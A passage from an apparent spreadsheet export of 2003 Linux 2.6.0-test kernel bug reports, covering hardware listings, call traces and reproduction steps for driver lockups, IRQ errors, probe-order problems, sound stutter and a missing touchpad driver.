&lt;MAbort- &gt;SERR- &lt;PERR- Latency: 192, cache line size 08 Interrupt: pin A routed to IRQ 11 Region 0: Memory at 10001000 (32-bit, non-prefetchable) [size=4K] Bus: primary=00, secondary=06, subordinate=09, sec-latency=176 Memory window 0: 00000000-00000000 (prefetchable) Memory window 1: 00000000-00000000 (prefetchable) I/O window 0: 00000000-00000003 I/O window 1: 00000000-00000003 BridgeCtl: Parity- SERR- ISA- VGA- MAbort- &gt;Reset+ 16bInt+ PostWrite- 16-bit legacy interface ports at 0001 00:0b.0 FireWire (IEEE 1394): NEC Corporation: Unknown device 00ce (rev 01) (prog-if 10 [OHCI]) Subsystem: Sharp corporation: Unknown device 1022 Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV+ VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 64, cache line size 08 Interrupt: pin A routed to IRQ 5 Region 0: Memory at f0001000 (32-bit, non-prefetchable) [size=4K] Capabilities: [60] Power Management version 2 Flags: PMEClk- DSI- D1- D2+ AuxCurrent=0mA PME(D0-,D1-,D2+,D3hot+,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 00:11.0 ISA bridge: VIA Technologies, Inc. VT8231 [PCI-to-ISA Bridge] (rev 10) Subsystem: Sharp corporation: Unknown device 1022 Control: I/O+ Mem+ BusMaster+ SpecCycle+ MemWINV- VGASnoop- ParErr- Stepping+ SERR- FastB2B- Status: Cap+ 66Mhz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Capabilities: [c0] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 00:11.1 IDE interface: VIA Technologies, Inc. VT82C586/B/686A/B PIPC Bus Master IDE (rev 06) (prog-if 8a [Master SecP PriP]) Subsystem: Sharp corporation: Unknown device 1022 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 64 Region 4: I/O ports at 1100 [size=16] Capabilities: [c0] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 00:11.2 USB Controller: VIA Technologies, Inc. USB (rev 1e) (prog-if 00 [UHCI]) Subsystem: Sharp corporation: Unknown device 1022 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 22 Interrupt: pin D routed to IRQ 10 Region 4: I/O ports at 1200 [size=32] Capabilities: [80] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 00:11.3 USB Controller: VIA Technologies, Inc. USB (rev 1e) (prog-if 00 [UHCI]) Subsystem: Sharp corporation: Unknown device 1022 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 22 Interrupt: pin D routed to IRQ 10 Region 4: I/O ports at 1300 [size=32] Capabilities: [80] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 00:11.4 Bridge: VIA Technologies, Inc. VT8235 ACPI (rev 10) Subsystem: Sharp corporation: Unknown device 1022 Control: I/O- Mem- BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Capabilities: [68] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 00:11.5 Multimedia audio controller: VIA Technologies, Inc. VT82C686 AC97 Audio Controller (rev 40) Subsystem: Sharp corporation: Unknown device 1022 Control: I/O+ Mem- BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Interrupt: pin C routed to IRQ 5 Region 0: I/O ports at e000 [size=256] Region 1: I/O ports at e100 [size=4] Region 2: I/O ports at e104 [size=4] Capabilities: [c0] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 00:11.6 Communication controller: VIA Technologies, Inc. Intel 537 [AC97 Modem] (rev 20) Subsystem: Sharp corporation: Unknown device 1022 Control: I/O+ Mem- BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Interrupt: pin C routed to IRQ 5 Region 0: I/O ports at e200 [size=256] Capabilities: [d0] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 00:12.0 Ethernet controller: VIA Technologies, Inc. VT6102 [Rhine-II] (rev 51) Subsystem: Sharp corporation: Unknown device 1022 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping+ SERR- FastB2B- Status: Cap+ 66Mhz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 128 (750ns min, 2000ns max), cache line size 04 Interrupt: pin A routed to IRQ 10 Region 0: I/O ports at e800 [size=256] Region 1: Memory at f0000000 (32-bit, non-prefetchable) [size=256] Capabilities: [40] Power Management version 2 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=0mA PME(D0+,D1+,D2+,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 01:00.0 VGA compatible controller: S3 Inc. VT8636A [ProSavage KN133] AGP4X VGA Controller (TwisterK) (rev 01) (prog-if 00 [VGA]) Subsystem: Sharp corporation: Unknown device 1022 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz+ UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 64 (1000ns min, 63750ns max), cache line size 04 Interrupt: pin A routed to IRQ 10 Region 0: Memory at e0000000 (32-bit, non-prefetchable) [size=512K] Region 1: Memory at 90000000 (32-bit, prefetchable) [size=128M] Expansion ROM at 000c0000 [disabled] [size=64K] Capabilities: [dc] Power Management version 2 Flags: PMEClk- DSI+ D1+ D2+ AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- Capabilities: [80] AGP version 2.0 Status: RQ=32 Iso- ArqSz=0 Cal=0 SBA- ITACoh- GART64- HTrans- 64bit- FW- AGP3- Rate=x4 Command: RQ=1 ArqSz=0 Cal=0 SBA- AGP- GART64- 64bit- FW- Rate=x4 Software Environment: Linux alfroid 2.6.0-test2 #6 Tue Jul 29 00:55:04 BST 2003 i686 GNU/Linux Gnu C 3.3.1 Gnu make 3.80 util-linux 2.11z mount 2.11z e2fsprogs 1.34-WIP PPP 2.4.1 nfs-utils 1.0.5 Linux C Library 2.3.1 Dynamic linker (ldd) 2.3.1 Procps 3.1.9 Net-tools 1.60 Console-tools 0.2.3 Sh-utils 5.0 Modules Loaded ide_scsi sg sr_mod scsi_mod cdrom rtc reiserfs via82cxxx_audio uart401 sound ac97_codec via_rhine mii grip version 3.0.7 Problem Description: Attempting CD Digital Audio Extraction using the Gnome application 'grip' cause the machine to lock solid. It is not possible to switch back to text mode with the usual Ctrl-Alt-F1 and the magic sysreq keys don't appear to do anything. Steps to reproduce: Attempt to exract audio from CD. Lockup occurs partway through the first track. The same CD will extract correctly on a the same machine running kernel 2.4.21. This bug may be related to bug #829.</t>
  </si>
  <si>
    <t>2006-09-28 13:23 UTC</t>
  </si>
  <si>
    <t>rmmod floppy sometimes hangs the box</t>
  </si>
  <si>
    <t>2003-08-08 15:45 UTC</t>
  </si>
  <si>
    <t>2003-09-19 07:44 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian Sid Hardware Environment: AMD XP 1700+ processor on a Soltek SL-75DRV5, Standard floppy disk Software Environment: linux kernel 2.6.0-test2-mm2 with ACPI enabled in the BIOS and support compiled in the kernel. module-init-tools 0.9.13-pre-1, mount 2.11z-4 Problem Description: the box hangs completely (although SysRq still works) reproducibly after several "modprobe floppy ; rmmod floppy" cycles. Steps to reproduce: I was in the middle of some investigation to guess why module "floppy" autoloads OK when "mount"ing and "ide-cd" not, when I suffered the described problem. The exact steps to reproduce the problem are: 1. mount /dev/fd0 /floppy (with NO floppy on the drive) 2. lsmod (to confirm the module "floppy" autoloaded OK) 3. rmmod floppy It seems (but I have not done measurements) it is more likely to hang the box the faster you go from step 1. to step 3. Apart from the hang, when the module "floppy" is unloaded you get the following messages (that I think kernel developers are already aware of): Aug 8 23:44:54 dardhal kernel: Device 'floppy0' does not have a release() function, it is broken and must be fixed. Aug 8 23:44:54 dardhal kernel: Badness in device_release at drivers/base/core.c:84 Aug 8 23:44:54 dardhal kernel: Call Trace: Aug 8 23:44:54 dardhal kernel: [&lt;c01a973d&gt;] kobject_cleanup+0x7d/0x80 Aug 8 23:44:54 dardhal kernel: [&lt;c02021a4&gt;] device_unregister+0x14/0x20 Aug 8 23:44:54 dardhal kernel: [&lt;e3b393d5&gt;] cleanup_module+0x15/0xb0 [floppy] Aug 8 23:44:54 dardhal kernel: [&lt;c012c16a&gt;] sys_delete_module+0x15a/0x1c0 Aug 8 23:44:54 dardhal kernel: [&lt;c013e797&gt;] sys_munmap+0x57/0x80 Aug 8 23:44:54 dardhal kernel: [&lt;c010916f&gt;] syscall_call+0x7/0xb Aug 8 23:44:54 dardhal kernel: Aug 8 23:44:54 dardhal kernel: kobject 'iosched' does not have a release() function, it is broken and must be fixed. Aug 8 23:44:54 dardhal kernel: Badness in kobject_cleanup at lib/kobject.c:402 Aug 8 23:44:54 dardhal kernel: Call Trace: Aug 8 23:44:54 dardhal kernel: [&lt;c01a9720&gt;] kobject_cleanup+0x60/0x80 Aug 8 23:44:54 dardhal kernel: [&lt;c020598b&gt;] elv_unregister_queue+0x1b/0x40 Aug 8 23:44:54 dardhal kernel: [&lt;c020905e&gt;] blk_unregister_queue+0x1e/0x50 Aug 8 23:44:54 dardhal kernel: [&lt;c020a10c&gt;] unlink_gendisk+0x1c/0x80 Aug 8 23:44:54 dardhal kernel: [&lt;c017a41a&gt;] del_gendisk+0x5a/0x100 Aug 8 23:44:54 dardhal kernel: [&lt;e3b3945c&gt;] cleanup_module+0x9c/0xb0 [floppy] Aug 8 23:44:54 dardhal kernel: [&lt;c012c16a&gt;] sys_delete_module+0x15a/0x1c0 Aug 8 23:44:54 dardhal kernel: [&lt;c013e797&gt;] sys_munmap+0x57/0x80 Aug 8 23:44:54 dardhal kernel: [&lt;c010916f&gt;] syscall_call+0x7/0xb Aug 8 23:44:54 dardhal kernel: Aug 8 23:44:54 dardhal kernel: kobject 'queue' does not have a release() function, it is broken and must be fixed. Aug 8 23:44:54 dardhal kernel: Badness in kobject_cleanup at lib/kobject.c:402 Aug 8 23:44:54 dardhal kernel: Call Trace: Aug 8 23:44:54 dardhal kernel: [&lt;c01a9720&gt;] kobject_cleanup+0x60/0x80 Aug 8 23:44:54 dardhal kernel: [&lt;c020906c&gt;] blk_unregister_queue+0x2c/0x50 Aug 8 23:44:54 dardhal kernel: [&lt;c020a10c&gt;] unlink_gendisk+0x1c/0x80 Aug 8 23:44:54 dardhal kernel: [&lt;c017a41a&gt;] del_gendisk+0x5a/0x100 Aug 8 23:44:54 dardhal kernel: [&lt;e3b3945c&gt;] cleanup_module+0x9c/0xb0 [floppy] Aug 8 23:44:54 dardhal kernel: [&lt;c012c16a&gt;] sys_delete_module+0x15a/0x1c0 Aug 8 23:44:54 dardhal kernel: [&lt;c013e797&gt;] sys_munmap+0x57/0x80 Aug 8 23:44:54 dardhal kernel: [&lt;c010916f&gt;] syscall_call+0x7/0xb Aug 8 23:44:54 dardhal kernel: In a few minutes I will attach a couple of files to this bug report, containing the "panic" messages as well as a "SysRq+T".</t>
  </si>
  <si>
    <t>OSS trident.c driver in 2.6.0-test2 locks up the machine on load</t>
  </si>
  <si>
    <t>2003-08-09 03:41 UTC</t>
  </si>
  <si>
    <t>2003-08-14 09:30 UTC</t>
  </si>
  <si>
    <t>The OSS trident.c driver on 2.6.0-test2 locks up the machine (thinkpad R-30) when loading it. It gets through register_sound_dsp and does not pass trident_ac97_init. I suspect the ac97 codec changes which went in in CVS revision 1.26, as the 1.25 revision loads fine. I'm working on it.</t>
  </si>
  <si>
    <t>Call Trace with ohci-hcd</t>
  </si>
  <si>
    <t>2003-08-09 05:58 UTC</t>
  </si>
  <si>
    <t>ramzez</t>
  </si>
  <si>
    <t>2003-08-14 09:27 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian Hardware Environment: chipset nvidia nforce2 ultra 400 (an nforce2 like) + amd xp 2600+ Software Environment: sid up-to-date with libc6 2.3.2 which I just update (I hope there is no problem with it) Problem Description: at boot time, I get a call trace with test3 which I didn't get with test2 ( I try with all mm series, including mm5) I compile all my test2 kernel with libc6-2.3.1-17 the test3 is compiled with libc6-2.3.2-2 (I think it's not the cause of my problem, but maybe I can try to compile test2 with the new libc, to test it) below is the error message in syslog : Aug 9 14:32:44 client kernel: ohci-hcd: 2003 Feb 24 USB 1.1 'Open' Host Controller (OHCI) Driver (PCI) Aug 9 14:32:44 client kernel: ohci-hcd: block sizes: ed 64 td 64 Aug 9 14:32:44 client kernel: ohci-hcd 0000:00:02.0: OHCI Host Controller Aug 9 14:32:44 client kernel: PCI: Setting latency timer of device 0000:00:02.0 to 64 Aug 9 14:32:44 client kernel: irq 3: nobody cared! Aug 9 14:32:44 client kernel: Call Trace: Aug 9 14:32:44 client kernel: [__report_bad_irq+42/144] __report_bad_irq+0x2a/0x90 Aug 9 14:32:44 client kernel: [note_interrupt+112/160] note_interrupt+0x70/0xa0 Aug 9 14:32:44 client kernel: [do_IRQ+288/304] do_IRQ+0x120/0x130 Aug 9 14:32:44 client kernel: [common_interrupt+24/32] common_interrupt+0x18/0x20 Aug 9 14:32:44 client kernel: [do_softirq+64/160] do_softirq+0x40/0xa0 Aug 9 14:32:44 client kernel: [do_IRQ+252/304] do_IRQ+0xfc/0x130 Aug 9 14:32:44 client kernel: [common_interrupt+24/32] common_interrupt+0x18/0x20 Aug 9 14:32:44 client kernel: [setup_irq+126/240] setup_irq+0x7e/0xf0 Aug 9 14:32:44 client kernel: [usb_hcd_irq+0/96] usb_hcd_irq+0x0/0x60 Aug 9 14:32:44 client kernel: [request_irq+128/208] request_irq+0x80/0xd0 Aug 9 14:32:44 client kernel: [usb_hcd_pci_probe+517/1184] usb_hcd_pci_probe+0x205/0x4a0 Aug 9 14:32:44 client kernel: [usb_hcd_irq+0/96] usb_hcd_irq+0x0/0x60 Aug 9 14:32:44 client kernel: [pci_device_probe_static+82/112] pci_device_probe_static+0x52/0x70 Aug 9 14:32:44 client kernel: [__pci_device_probe+60/80] __pci_device_probe+0x3c/0x50 Aug 9 14:32:44 client kernel: [pci_device_probe+47/80] pci_device_probe+0x2f/0x50 Aug 9 14:32:44 client kernel: [bus_match+69/128] bus_match+0x45/0x80 Aug 9 14:32:44 client kernel: [driver_attach+92/96] driver_attach+0x5c/0x60 Aug 9 14:32:44 client kernel: [bus_add_driver+147/176] bus_add_driver+0x93/0xb0 Aug 9 14:32:44 client kernel: [driver_register+47/64] driver_register+0x2f/0x40 Aug 9 14:32:44 client kernel: [pci_register_driver+112/160] pci_register_driver+0x70/0xa0 Aug 9 14:32:44 client kernel: [ohci_hcd_pci_init+89/192] ohci_hcd_pci_init+0x59/0xc0 Aug 9 14:32:44 client kernel: [do_initcalls+44/160] do_initcalls+0x2c/0xa0 Aug 9 14:32:44 client kernel: [init_workqueues+15/96] init_workqueues+0xf/0x60 Aug 9 14:32:44 client kernel: [init+47/464] init+0x2f/0x1d0 Aug 9 14:32:44 client kernel: [init+0/464] init+0x0/0x1d0 Aug 9 14:32:44 client kernel: [kernel_thread_helper+5/16] kernel_thread_helper+0x5/0x10 Aug 9 14:32:44 client kernel: Aug 9 14:32:44 client kernel: handlers: Aug 9 14:32:44 client kernel: [usb_hcd_irq+0/96] (usb_hcd_irq+0x0/0x60) Aug 9 14:32:44 client kernel: Disabling IRQ #3 Aug 9 14:32:44 client kernel: ohci-hcd 0000:00:02.0: irq 3, pci mem e181a000 Aug 9 14:32:44 client modprobe: FATAL: Module /dev/~ not found. Aug 9 14:32:44 client kernel: ohci-hcd 0000:00:02.0: new USB bus registered, assigned bus number 2 Aug 9 14:32:45 client kernel: hub 2-0:0: USB hub found Aug 9 14:32:45 client kernel: hub 2-0:0: 3 ports detected Aug 9 14:32:45 client kernel: ohci-hcd 0000:00:02.1: OHCI Host Controller Aug 9 14:32:45 client kernel: PCI: Setting latency timer of device 0000:00:02.1 to 64 Aug 9 14:32:45 client kernel: irq 5: nobody cared! Aug 9 14:32:45 client kernel: Call Trace: Aug 9 14:32:45 client kernel: [__report_bad_irq+42/144] __report_bad_irq+0x2a/0x90 Aug 9 14:32:45 client kernel: [note_interrupt+112/160] note_interrupt+0x70/0xa0 Aug 9 14:32:45 client kernel: [do_IRQ+288/304] do_IRQ+0x120/0x130 Aug 9 14:32:45 client kernel: [common_interrupt+24/32] common_interrupt+0x18/0x20 Aug 9 14:32:45 client kernel: [do_softirq+64/160] do_softirq+0x40/0xa0 Aug 9 14:32:45 client kernel: [do_IRQ+252/304] do_IRQ+0xfc/0x130 Aug 9 14:32:45 client kernel: [common_interrupt+24/32] common_interrupt+0x18/0x20 Aug 9 14:32:45 client kernel: [setup_irq+126/240] setup_irq+0x7e/0xf0 Aug 9 14:32:45 client kernel: [usb_hcd_irq+0/96] usb_hcd_irq+0x0/0x60 Aug 9 14:32:45 client kernel: [request_irq+128/208] request_irq+0x80/0xd0 Aug 9 14:32:45 client kernel: [usb_hcd_pci_probe+517/1184] usb_hcd_pci_probe+0x205/0x4a0 Aug 9 14:32:45 client kernel: [usb_hcd_irq+0/96] usb_hcd_irq+0x0/0x60 Aug 9 14:32:45 client kernel: [pci_device_probe_static+82/112] pci_device_probe_static+0x52/0x70 Aug 9 14:32:45 client kernel: [__pci_device_probe+60/80] __pci_device_probe+0x3c/0x50 Aug 9 14:32:45 client kernel: [pci_device_probe+47/80] pci_device_probe+0x2f/0x50 Aug 9 14:32:45 client kernel: [bus_match+69/128] bus_match+0x45/0x80 Aug 9 14:32:45 client kernel: [driver_attach+92/96] driver_attach+0x5c/0x60 Aug 9 14:32:45 client kernel: [bus_add_driver+147/176] bus_add_driver+0x93/0xb0 Aug 9 14:32:45 client kernel: [driver_register+47/64] driver_register+0x2f/0x40 Aug 9 14:32:45 client kernel: [pci_register_driver+112/160] pci_register_driver+0x70/0xa0 Aug 9 14:32:45 client kernel: [ohci_hcd_pci_init+89/192] ohci_hcd_pci_init+0x59/0xc0 Aug 9 14:32:45 client kernel: [do_initcalls+44/160] do_initcalls+0x2c/0xa0 Aug 9 14:32:45 client kernel: [init_workqueues+15/96] init_workqueues+0xf/0x60 Aug 9 14:32:45 client kernel: [init+47/464] init+0x2f/0x1d0 Aug 9 14:32:45 client kernel: [init+0/464] init+0x0/0x1d0 Aug 9 14:32:45 client kernel: [kernel_thread_helper+5/16] kernel_thread_helper+0x5/0x10 Aug 9 14:32:45 client kernel: Aug 9 14:32:45 client kernel: handlers: Aug 9 14:32:45 client kernel: [usb_hcd_irq+0/96] (usb_hcd_irq+0x0/0x60) Aug 9 14:32:45 client kernel: Disabling IRQ #5 Aug 9 14:32:45 client kernel: ohci-hcd 0000:00:02.1: irq 5, pci mem e181c000 Aug 9 14:32:45 client kernel: ohci-hcd 0000:00:02.1: new USB bus registered, assigned bus number 3 Aug 9 14:32:45 client kernel: hub 3-0:0: USB hub found Aug 9 14:32:45 client kernel: hub 3-0:0: 3 ports detected Steps to reproduce: at boot time</t>
  </si>
  <si>
    <t>Wrong filesystem probing order (UDF&gt;ReiserFS)</t>
  </si>
  <si>
    <t>2003-08-09 12:15 UTC</t>
  </si>
  <si>
    <t>2003-08-25 10:49 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian testing/unstable Hardware Environment: i386 Software Environment: /dev/hda3 is / on reiserfs Problem Description: When both UDF and ReiserFS are compiled in the kernel, the probe order is wrong (it's probing for UDF first and then ReiserFS, but UDF seems to be somehow accepting a bit of what it sees, which is scary. What if by chance the other values (which keep changing) match what UDF expects?) Steps to reproduce: 1. Compile both ReiserFS and UDF as built-in 2. Load the kernel with / as a reiserfs filesystem dmesg output: UDF-fs DEBUG fs/udf/lowlevel.c:65:udf_get_last_session: CDROMMULTISESSION not supported: rc=-22 UDF-fs DEBUG fs/udf/super.c:1472:udf_fill_super: Multi-session=0 UDF-fs DEBUG fs/udf/super.c:460:udf_vrs: Starting at sector 16 (2048 byte sectors) UDF-fs DEBUG fs/udf/super.c:1208:udf_check_valid: Failed to read byte 32768. Assuming open disc. Skipping validity check UDF-fs DEBUG fs/udf/misc.c:286:udf_read_tagged: location mismatch block 256, tag 1634235183 != 256 UDF-fs DEBUG fs/udf/super.c:1262:udf_load_partition: No Anchor block found UDF-fs: No partition found (1) found reiserfs format "3.6" with standard journal Reiserfs journal params: device hda3, size 8192, journal first block 18, max tra ns len 1024, max batch 900, max commit age 30, max trans age 30 reiserfs: checking transaction log (hda3) for (hda3) Using r5 hash to sort names VFS: Mounted root (reiserfs filesystem) readonly. The udf_read_tagged line value keeps changing. I didn't get a 256 yet... Looks like UDF does not have a magic number in its superblock (does it even have a superblock?). Filesystems with no magic should probably be probed later.</t>
  </si>
  <si>
    <t>i2c chips probe order wrong (lm75&gt;w83781d)</t>
  </si>
  <si>
    <t>Hardware Monitoring</t>
  </si>
  <si>
    <t>2003-08-09 12:30 UTC</t>
  </si>
  <si>
    <t>2005-08-08 12:26 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian testing/unstable Hardware Environment: K6 CPU P5AB motherboard 00:00.0 Host bridge: ALi Corporation M1541 (rev 04) 00:01.0 PCI bridge: ALi Corporation M1541 PCI to AGP Controller (rev 04) 00:03.0 Bridge: ALi Corporation M7101 PMU 00:07.0 ISA bridge: ALi Corporation M1533 PCI to ISA Bridge [Aladdin IV] (rev c3) 00:0a.0 Ethernet controller: Realtek Semiconductor Co., Ltd. RTL-8029(AS) 00:0b.0 VGA compatible controller: S3 Inc. ViRGE/DX or /GX (rev 01) 00:0f.0 IDE interface: ALi Corporation M5229 IDE (rev c1) Software Environment: Problem Description: Both w83781d and lm75 seem to be claiming the same device as shown in the following dmesg snippet: i2c /dev entries driver module version 2.7.0 (20021208) i2c-ali1535 version 2.7.0 (20021208) ali1535_smbus 0000:00:03.0: SMB device not enabled - upgrade BIOS? ali1535_smbus 0000:00:03.0: ALI1535 not detected, module not inserted. i2c-ali15x3.o version 2.7.0 (20021208) registering 0-0048 registering 0-0049 registering 0-002d w83781d 0-002d: Subclient 0 registration at address 0x49 failed. # ls /sys/bus/i2c/drivers/lm75/ 0-0048 0-0049 I think the w83781d should be probed first so it can get its lm75 subclients when both are compiled in the kernel. Steps to reproduce: Compile both lm75 and w83781d as built-in</t>
  </si>
  <si>
    <t>No sound at console, sound stutters going from X to console</t>
  </si>
  <si>
    <t>2003-08-10 01:33 UTC</t>
  </si>
  <si>
    <t>Matt McAdoo</t>
  </si>
  <si>
    <t>2003-08-25 06:34 UTC</t>
  </si>
  <si>
    <t>Distribution: Slackware 9 Hardware Environment: Mobo: Asus A7N8X Deluxe mcadoo@darkstar:~$ cat /proc/cpuinfo processor : 0 vendor_id : AuthenticAMD cpu family : 6 model : 10 model name : AMD Athlon(tm) XP 2500+ stepping : 0 cpu MHz : 1830.040 cache size : 512 KB fdiv_bug : no hlt_bug : no f00f_bug : no coma_bug : no fpu : yes fpu_exception : yes cpuid level : 1 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 mmx fxsr sse syscall mmxext 3dnowext 3dnow bogomips : 3620.86 mcadoo@darkstar:~$ /sbin/lspci 00:00.0 Host bridge: nVidia Corporation: Unknown device 01e0 (rev c1) 00:00.1 RAM memory: nVidia Corporation: Unknown device 01eb (rev c1) 00:00.2 RAM memory: nVidia Corporation: Unknown device 01ee (rev c1) 00:00.3 RAM memory: nVidia Corporation: Unknown device 01ed (rev c1) 00:00.4 RAM memory: nVidia Corporation: Unknown device 01ec (rev c1) 00:00.5 RAM memory: nVidia Corporation: Unknown device 01ef (rev c1) 00:01.0 ISA bridge: nVidia Corporation nForce2 ISA Bridge (rev a4) 00:01.1 SMBus: nVidia Corporation nForce2 SMBus (MCP) (rev a2) 00:02.0 USB Controller: nVidia Corporation nForce2 USB Controller (rev a4) 00:02.1 USB Controller: nVidia Corporation nForce2 USB Controller (rev a4) 00:02.2 USB Controller: nVidia Corporation nForce2 USB Controller (rev a4) 00:04.0 Ethernet controller: nVidia Corporation nForce2 Ethernet Controller (rev a1) 00:05.0 Multimedia audio controller: nVidia Corporation nForce MultiMedia audio [Via VT82C686B] (rev a2) 00:06.0 Multimedia audio controller: nVidia Corporation nForce2 AC97 Audio Controler (MCP) (rev a1) 00:08.0 PCI bridge: nVidia Corporation: Unknown device 006c (rev a3) 00:09.0 IDE interface: nVidia Corporation nForce2 IDE (rev a2) 00:0c.0 PCI bridge: nVidia Corporation: Unknown device 006d (rev a3) 00:0d.0 FireWire (IEEE 1394): nVidia Corporation nForce2 FireWire (IEEE 1394) Controller (rev a3) 00:1e.0 PCI bridge: nVidia Corporation nForce2 AGP (rev c1) 01:07.0 Unknown mass storage controller: Promise Technology, Inc. 20268 (rev 01) 01:08.0 Ethernet controller: Realtek Semiconductor Co., Ltd. RTL-8139/8139C/8139C+ (rev 10) 01:0b.0 RAID bus controller: CMD Technology Inc Silicon Image SiI 3112 SATARaid Controller (rev 02) 02:01.0 Ethernet controller: 3Com Corporation 3C920B-EMB Integrated Fast Ethernet Controller (rev 40) 03:00.0 VGA compatible controller: ATI Technologies Inc Radeon RV200 QW [Radeon 7500] Software Environment: Problem Description: Sound will not play when invoked at the console (ie. mpg321). While in X, the system will output sound, but if switched to a colsole window, the sound will lag (only making a one second burst every 3-5 seconds, if that). Switch back to X and the sound will begin playing again, but stuttering at a high rate. Pause and play the music, sound is fine again. Steps to reproduce: Have tried with both MP3 and OGG files, and different players, mpg321 and xmms. No support for OSS is compiled in the kernel, just Alsa.</t>
  </si>
  <si>
    <t>Laptop touchpad does not work; synaptics driver missing</t>
  </si>
  <si>
    <t>2003-08-10 10:30 UTC</t>
  </si>
  <si>
    <t>D Bandopadhyay</t>
  </si>
  <si>
    <t>2004-02-01 02:25 UTC</t>
  </si>
  <si>
    <t>Distribution: Gentoo GNU/Linux Hardware Environment: Dell Inspiron 8100 Software Environment: XFree 4.3.0 Problem Description: Laptop touchpad does not work; synaptics driver missing Steps to reproduce: Configure kernel, compile and boot off kernel. Touch pad won't work. Description: If you configure the kernel by including all options necessary for your laptop and boot off it the touchpad on your laptop will not work. I had to do additionally the following in order to get it to work. (1) visit and read http://w1.894.telia.com/~u89404340/touchpad/ (2) wget http://w1.894.telia.com/~u89404340/touchpad/synaptics-0.11.3p11.tar.bz2 -P ~ (3) tar -xvjf ~/synaptics-0.11.3p11.tar.bz2 (4) cp synaptics/synaptics_drv.o /usr/X11R6/lib/modules/input/ (5) modify /etc/X11/XF86Config-4 to replace existing InputDevice section with text below. Section "InputDevice" Identifier "Mouse0" Driver "synaptics" Option "Device" "/dev/input/event0" Option "Protocol" "event" Option "LeftEdge" "1900" Option "RightEdge" "5400" Option "BottomEdge" "1800" Option "TopEdge" "3900" Option "FingerLow" "25" Option "FingerHigh" "30" Option "MaxTapTime" "180" Option "MaxTapMove" "220" Option "VertScrollDelta" "100" Option "MinSpeed" "0.02" Option "MaxSpeed" "0.18" Option "AccelFactor" "0.0010" #Option "Emulate3Buttons" "on" #Option "Repeater" "/dev/ps2mouse" #Option "SHMConfig" "on" EndSection (6) restart xfree server Instead of this six step procedure can this be made into a one step procedure of simply enabling an option in the kernel? There are literally hundreds of users who are experiencing this same problem in the Gentoo Linux community and as a result one of them took the initiative to write a small how-to [1] summarised above by 